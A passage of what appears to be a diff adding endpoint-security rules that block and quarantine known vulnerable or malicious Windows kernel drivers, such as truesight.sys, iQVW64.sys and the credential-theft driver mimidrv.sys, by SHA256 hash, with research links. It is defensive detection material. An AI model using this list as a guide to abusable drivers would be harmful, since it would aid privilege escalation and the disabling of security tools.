"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477141Z", + "creation_date": "2026-03-23T11:45:30.477145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477153Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "033c4634ab1a43bc3247384864f3380401d3b4006a383312193799dded0de4c7", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fee9d4e6-b1eb-5d40-ae28-11e89a55cd2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478162Z", + "creation_date": "2026-03-23T11:45:30.478166Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34d55c87feec5eeb4f826fc6301c22017cd3e83387529a06c5493c260597599b", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "feefadfe-5f06-51fb-9061-0e337cb84d75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473009Z", + "creation_date": "2026-03-23T11:45:30.473012Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "922d23999a59ce0d84b479170fd265650bc7fae9e7d41bf550d8597f472a3832", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fefdfffa-a9ca-59b6-bc7f-f9fa6b500ab6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819123Z", + "creation_date": "2026-03-23T11:45:30.819125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb11fe81a2d2ca868398055e9f8cc7349ff4ac6d0a4f1e85e7e5d04ed7357349", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff189a6d-8933-5d47-bacc-5aad0fc2ce04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972319Z", + "creation_date": "2026-03-23T11:45:29.972321Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7fe1fa6d2e5502ff1882a345790d0aab3ad34fe269ab23e3115d2d93db3fe6b", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff1dba48-e4ae-5478-a65a-159da779a864", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479473Z", + "creation_date": "2026-03-23T11:45:31.479477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479487Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e960f161a76f0f805553471bc9d0eaa4b4dfa346ead37000892f2b7cc3e4872d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff20271a-86dd-5bd7-8423-8b1792d7b359", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984017Z", + "creation_date": "2026-03-23T11:45:29.984019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984024Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37e33b54de1bbe4cf86fa58aeec39084afb35e0cbe5f69c763ecaec1d352daa0", + "comment": "Vulnerable Kernel Driver (aka msrhook.sys) [https://www.loldrivers.io/drivers/1a1cf88a-96d0-46cd-a24d-1535e4a5f6e3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff21aca7-04e6-5115-b8d7-beed0a7c076d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499564Z", + "creation_date": "2026-03-23T11:45:31.499567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "829250e3c5cecd882f57e1e64593b7aa3ed89a9919ffa9b85183dac4f1f9b873", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff24216c-1e4e-5239-b499-1c245ee8d2f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816803Z", + "creation_date": "2026-03-23T11:45:30.816805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b4ea21da21a1167c00b903c05a4e3af6c514ea3dfe0b5f371f6a06305e1d27f", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff30d18a-4dc2-54c7-9466-0dfa2ff07e2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156310Z", + "creation_date": "2026-03-23T11:45:31.156311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156317Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9561b6d8c5328b01f05c7499624469085e1144f0d9f33568f3f1d438b70d06a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff33279e-1617-5fd8-8baf-d64a7c5f936e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141768Z", + "creation_date": 
"2026-03-23T11:45:31.141770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d6101de6d747a4d88af30797fff089e04996019fa7c0d3c1895b1f92dbcac95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff3898a6-785a-59f8-8b8c-0f352b1297ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469303Z", + "creation_date": "2026-03-23T11:45:30.469307Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6d56ffa4dcec362148ce6b3806773403cf7ca61f991e17f7286ee975a706f78", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff3adaaa-2d2c-5f46-924b-1a7f450d5a4b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465681Z", + "creation_date": "2026-03-23T11:45:30.465684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff4b48ce-f581-5db8-8e6d-1ef95c245b8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467355Z", + "creation_date": "2026-03-23T11:45:30.467359Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467368Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "714ac82a4e2b971f19df9c5cdcc7d7df52ac44ce1bfad675e50122406bed04a2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff50e5fb-13b8-5020-8e94-0cfd02d550f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808811Z", + "creation_date": "2026-03-23T11:45:31.808815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0dc31969cb6816b185b4e3bb3e96b8344be4a31826c5d9a0a65d8411ba7d898", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff54fa68-6bc5-5e95-87d7-64773a1a2b35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469747Z", + "creation_date": "2026-03-23T11:45:30.469750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29d6155c68ff372a475d6fe5bde64caa68794bb4164f7e1aae7da5b744f6e6d2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff6da08d-5126-57d9-b960-7b403a6518de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818238Z", + "creation_date": "2026-03-23T11:45:31.818241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c96999c48ea74f5631b192f4ce4e64a137e10be4e8d35d68e5199758c2a1dd7c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff6e5dac-ebc3-5044-b75e-973cddfad7c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457187Z", + "creation_date": "2026-03-23T11:45:30.457190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89d96210bf36a88acb14086c96e916b790d21b7adf81d0907c823ca2afbe0ce3", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff6ebc2e-387d-59ab-86b6-94d9422242cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818648Z", + "creation_date": 
"2026-03-23T11:45:30.818650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6e714528ad1b9eae72699078499735468140c1627e45f015762206ba7a77b47", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff849d11-b5d2-5733-92e5-ed5b5b4ae4db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810864Z", + "creation_date": "2026-03-23T11:45:31.810866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810883Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56bc9c2039028f56ed4735492b4dd06e9042a5c8b3abd87055ae6f3ae5ce1d8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ff8eef78-9470-58c7-b2a5-19886bed49e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808613Z", + "creation_date": "2026-03-23T11:45:31.808615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97a17e66a5a57f9a605a12b28c1f9c19df376c6b1404403c3b7408c90835c4f9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff91ea5b-d69a-5ce6-95ce-1dde42bd504f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612474Z", + "creation_date": "2026-03-23T11:45:29.612476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.612481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ff8bcc7f938ec71ee33fbe089d38e40a8190603558d4765c47b1b09e1dd764a", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff92cf25-74f6-53f9-810e-9e79c1b2d121", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142682Z", + "creation_date": "2026-03-23T11:45:31.142684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1427fc96e7fc1ece542fa47154ce48504dd0b894289e3840037c4e5f94c587d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff93b0c8-1de4-50f4-913a-89cffcbbf120", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615954Z", + "creation_date": "2026-03-23T11:45:29.615956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615962Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee15f36881b84a2da82fee37e8ad65e47f1224e64d1d6fe43f7a5ad2efe92f5d", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff97cfe3-92c8-5380-bdab-4c038330e5ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818842Z", + "creation_date": "2026-03-23T11:45:30.818844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
